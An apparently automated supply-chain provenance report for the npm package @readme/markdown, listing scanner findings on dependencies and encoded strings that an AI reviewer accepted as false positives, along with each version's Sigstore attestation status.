@readme/markdown
ReadMe's React-based Markdown parser
Supply chain provenance
Status for the latest visible version.
Maintainers
Accepted risks
Findings the reviewer chose to accept rather than block on.
| Source | Rule | Reason | Accepted by | When |
|---|---|---|---|---|
| phantom-deps | phantom-dep:estree-util-build-jsx | AI (phantom-deps): Bundled dep; phantom-dep is a false positive for this webpack-bundled package. | ai | |
| phantom-deps | phantom-dep:mdast-util-mdxjs-esm | AI (phantom-deps): Bundled dep; phantom-dep is a false positive for this webpack-bundled package. | ai | |
| phantom-deps | phantom-dep:micromark-extension-mdxjs-esm | AI (phantom-deps): Bundled dep; phantom-dep is a false positive for this webpack-bundled package. | ai | |
| source-diff | encoded-string-file:dist/main.js | AI (source-diff): Encoded string is htmlparser2/entities decode trie (base64-packed HTML entity data), not obfuscated malware. | ai | |
| source-diff | encoded-string-file:dist/main.node.js | AI (source-diff): Same htmlparser2/entities decode trie pattern in node bundle; benign data encoding. | ai | |
| phantom-deps | phantom-dep:htmlparser2 | AI (phantom-deps): Bundled into dist via webpack; not directly imported in source but legitimately used. | ai | |
| phantom-deps | phantom-dep:estree-util-to-js | AI (phantom-deps): Bundled dep; phantom-dep is a false positive for this webpack-bundled package. | ai | |
| phantom-deps | phantom-dep:micromark-extension-mdxjs | AI (phantom-deps): Config-driven plugin loading; stable pattern for this markdown processor. | ai | |
| publish-pattern | new-deps-added | AI (publish-pattern): New deps are legitimate unified/micromark ecosystem packages matching the package's MDX parsing purpose. | ai | |
| dependencies | unvetted-dep:rehype-react | AI (dependencies): Well-known unified/rehype ecosystem package; stable dependency for this markdown parser. | ai | |
| dependencies | unvetted-dep:@readme/syntax-highlighter | AI (dependencies): Same org (@readme) as this package; expected internal dependency. | ai | |
| dependencies | unvetted-dep:@readme/emojis | AI (dependencies): Same org (@readme) as this package; expected internal dependency. | ai | |
| dependencies | unvetted-dep:@readme/variable | AI (dependencies): Same org (@readme) as this package; expected internal dependency. | ai | |
| dependencies | unvetted-dep:xast-util-to-xml | AI (dependencies): Well-known unified ecosystem utility; stable dependency for this markdown parser. | ai | |
| dependencies | unvetted-dep:unist-util-flatmap | AI (dependencies): Well-known unified ecosystem utility; stable dependency for this markdown parser. | ai | |
| dependencies | unvetted-dep:react-native-known-styling-properties | AI (dependencies): Used for CSS property validation in the markdown renderer; benign data package. | ai | |
| phantom-deps | phantom-dep:postcss-prefix-selector | AI (phantom-deps): Stable false positive for this bundled markdown package. | ai | |
| phantom-deps | phantom-dep:react-html-attributes | AI (phantom-deps): Stable false positive for this bundled markdown package. | ai | |
| phantom-deps | phantom-dep:micromark-util-symbol | AI (phantom-deps): Stable false positive for this bundled markdown package. | ai | |
| phantom-deps | phantom-dep:mdast-util-phrasing | AI (phantom-deps): Stable false positive; bundled package with many transitive deps not directly imported at top level. | ai | |
| phantom-deps | phantom-dep:hast-util-from-html | AI (phantom-deps): Declared in package.json as a runtime dep; phantom-dep heuristic false positive for this bundled package. | ai | |
| phantom-deps | phantom-dep:estree-util-value-to-estree | AI (phantom-deps): Stable false positive for this bundled markdown package. | ai | |
| phantom-deps | phantom-dep:mdast-util-mdx-expression | AI (phantom-deps): Stable false positive for this bundled markdown package. | ai | |
| phantom-deps | phantom-dep:unist-util-visit-parents | AI (phantom-deps): Stable false positive for this bundled markdown package. | ai | |
| phantom-deps | phantom-dep:mdast-util-find-and-replace | AI (phantom-deps): Stable false positive for this bundled markdown package. | ai | |
| phantom-deps | phantom-dep:mdast-util-gfm-strikethrough | AI (phantom-deps): Stable false positive for this bundled markdown package. | ai | |
| phantom-deps | phantom-dep:micromark-util-html-tag-name | AI (phantom-deps): Stable false positive for this bundled markdown package. | ai | |
| phantom-deps | phantom-dep:micromark-extension-mdx-expression | AI (phantom-deps): Stable false positive for this bundled markdown package. | ai | |
| phantom-deps | phantom-dep:micromark-extension-gfm-strikethrough | AI (phantom-deps): Stable false positive for this bundled markdown package. | ai | |
| phantom-deps | phantom-dep:micromark-util-character | AI (phantom-deps): Stable false positive for this bundled markdown package. | ai | |
| phantom-deps | phantom-dep:hast-util-sanitize | AI (phantom-deps): Bundled dependency pattern. | ai | |
| phantom-deps | phantom-dep:html-tags | AI (phantom-deps): Large bundled markdown package; many deps used indirectly via webpack bundle, not direct imports. | ai | |
| phantom-deps | phantom-dep:hastscript | AI (phantom-deps): Same as above — bundled dependency pattern for this package. | ai | |
| phantom-deps | phantom-dep:rehype-raw | AI (phantom-deps): Bundled dependency pattern. | ai | |
| phantom-deps | phantom-dep:remark-mdx | AI (phantom-deps): Bundled dependency pattern. | ai | |
| phantom-deps | phantom-dep:tailwindcss | AI (phantom-deps): Bundled dependency pattern. | ai | |
| phantom-deps | phantom-dep:rehype-parse | AI (phantom-deps): Bundled dependency pattern. | ai | |
| phantom-deps | phantom-dep:remark-parse | AI (phantom-deps): Bundled dependency pattern. | ai | |
| phantom-deps | phantom-dep:lodash.escape | AI (phantom-deps): Bundled dependency pattern. | ai | |
| phantom-deps | phantom-dep:rehype-remark | AI (phantom-deps): Bundled dependency pattern. | ai | |
| phantom-deps | phantom-dep:remark-breaks | AI (phantom-deps): Bundled dependency pattern. | ai | |
| phantom-deps | phantom-dep:remark-rehype | AI (phantom-deps): Bundled dependency pattern. | ai | |
| phantom-deps | phantom-dep:github-slugger | AI (phantom-deps): Bundled dependency pattern. | ai | |
| phantom-deps | phantom-dep:mdast-util-gfm | AI (phantom-deps): Bundled dependency pattern. | ai | |
| phantom-deps | phantom-dep:path-browserify | AI (phantom-deps): Bundled dependency pattern. | ai | |
| phantom-deps | phantom-dep:rehype-sanitize | AI (phantom-deps): Bundled dependency pattern. | ai | |
| phantom-deps | phantom-dep:lodash.kebabcase | AI (phantom-deps): Bundled dependency pattern. | ai | |
| phantom-deps | phantom-dep:rehype-stringify | AI (phantom-deps): Bundled dependency pattern. | ai | |
| phantom-deps | phantom-dep:remark-stringify | AI (phantom-deps): Bundled dependency pattern. | ai | |
| phantom-deps | phantom-dep:unist-util-visit | AI (phantom-deps): Bundled dependency pattern. | ai | |
| phantom-deps | phantom-dep:debug | AI (phantom-deps): Large bundled package; deps consumed transitively or via config, not direct imports. | ai | |
| phantom-deps | phantom-dep:react-native-known-styling-properties | AI (phantom-deps): Platform-specific dep used in bundle; stable false positive. | ai | |
| phantom-deps | phantom-dep:unist-util-flatmap | AI (phantom-deps): Transitive/bundled dep pattern for this package. | ai | |
| phantom-deps | phantom-dep:xast-util-to-xml | AI (phantom-deps): Transitive/bundled dep pattern for this package. | ai | |
| phantom-deps | phantom-dep:@readme/variable | AI (phantom-deps): Same-org dep; consumed via bundle, stable false positive. | ai | |
| phantom-deps | phantom-dep:@readme/emojis | AI (phantom-deps): Same-org dep; consumed via bundle, stable false positive. | ai | |
| phantom-deps | phantom-dep:rehype-react | AI (phantom-deps): Transitive/bundled dep pattern for this package. | ai | |
| phantom-deps | phantom-dep:deepmerge | AI (phantom-deps): Transitive/bundled dep pattern for this package. | ai | |
| phantom-deps | phantom-dep:entities | AI (phantom-deps): Transitive/bundled dep pattern for this package. | ai | |
| phantom-deps | phantom-dep:process | AI (phantom-deps): Webpack polyfill; referenced in webpack config, not direct import. | ai | |
| phantom-deps | phantom-dep:remark | AI (phantom-deps): Same as above — bundled markdown library pattern. | ai |
Versions (showing 28 of 28)
| Version | Deps | Published |
|---|---|---|
| 14.7.1 | 64 / 64 | |
| 14.7.0 | 64 / 64 | |
| 14.6.0 | 64 / 64 | |
| 14.5.0 | 64 / 64 | |
| 14.4.1 | 64 / 64 | |
| 14.4.0 | 64 / 64 | |
| 14.3.0 | 64 / 64 | |
| 14.2.6 | 60 / 64 | |
| 14.2.5 | 60 / 64 | |
| 14.2.4 | 59 / 64 | |
| 14.2.3 | 59 / 64 | |
| 14.2.2 | 59 / 64 | |
| 14.2.1 | 59 / 64 | |
| 14.2.0 | 57 / 64 | |
| 14.1.4 | 57 / 64 | |
| 14.1.3 | 57 / 64 | |
| 14.1.2 | 57 / 64 | |
| 14.1.1 | 57 / 64 | |
| 14.1.0 | 57 / 64 | |
| 14.0.0 | 57 / 64 | |
| 13.8.5 | 57 / 64 | |
| 13.8.4 | 57 / 64 | |
| 13.8.3 | 57 / 64 | |
| 13.8.2 | 57 / 64 | |
| 13.8.1 | 57 / 64 | |
| 13.8.0 | 57 / 64 | |
| 13.7.4 | 57 / 64 | |
| 13.7.3 | 57 / 64 |
v14.7.1
1 findingPublished via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v14.7.0
1 findingPublished via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v14.6.0
1 findingPublished via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v14.5.0
1 findingPublished via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v14.4.1
3 findingsModified file contains 1 long encoded string(s) (200+ chars). These are commonly used to hide malicious payloads.
Modified file contains 1 long encoded string(s) (200+ chars). These are commonly used to hide malicious payloads.
Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v14.4.0
3 findingsModified file contains 1 long encoded string(s) (200+ chars). These are commonly used to hide malicious payloads.
Modified file contains 1 long encoded string(s) (200+ chars). These are commonly used to hide malicious payloads.
Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v14.3.0
3 findingsModified file contains 1 long encoded string(s) (200+ chars). These are commonly used to hide malicious payloads.
Modified file contains 1 long encoded string(s) (200+ chars). These are commonly used to hide malicious payloads.
Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v14.2.6
3 findingsModified file contains 1 long encoded string(s) (200+ chars). These are commonly used to hide malicious payloads.
Modified file contains 1 long encoded string(s) (200+ chars). These are commonly used to hide malicious payloads.
Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v14.2.5
3 findingsModified file contains 1 long encoded string(s) (200+ chars). These are commonly used to hide malicious payloads.
Modified file contains 1 long encoded string(s) (200+ chars). These are commonly used to hide malicious payloads.
Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v14.2.4
1 findingPublished via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v14.2.3
1 findingPublished via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v14.2.2
1 findingPublished via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v14.2.1
1 findingPublished via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v14.2.0
1 findingPublished via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v14.1.4
1 findingPublished via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v14.1.3
1 findingPublished via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v14.1.2
1 findingPublished via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v14.1.1
1 findingPublished via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v14.1.0
1 findingPublished via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v14.0.0
1 findingPublished via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v13.8.5
1 findingPublished via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v13.8.4
1 findingPublished via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v13.8.3
1 findingPublished via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v13.8.2
1 findingPublished via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v13.8.1
1 findingPublished via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v13.8.0
1 findingPublished via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v13.7.4
1 findingPublished via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v13.7.3
1 findingPublished via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.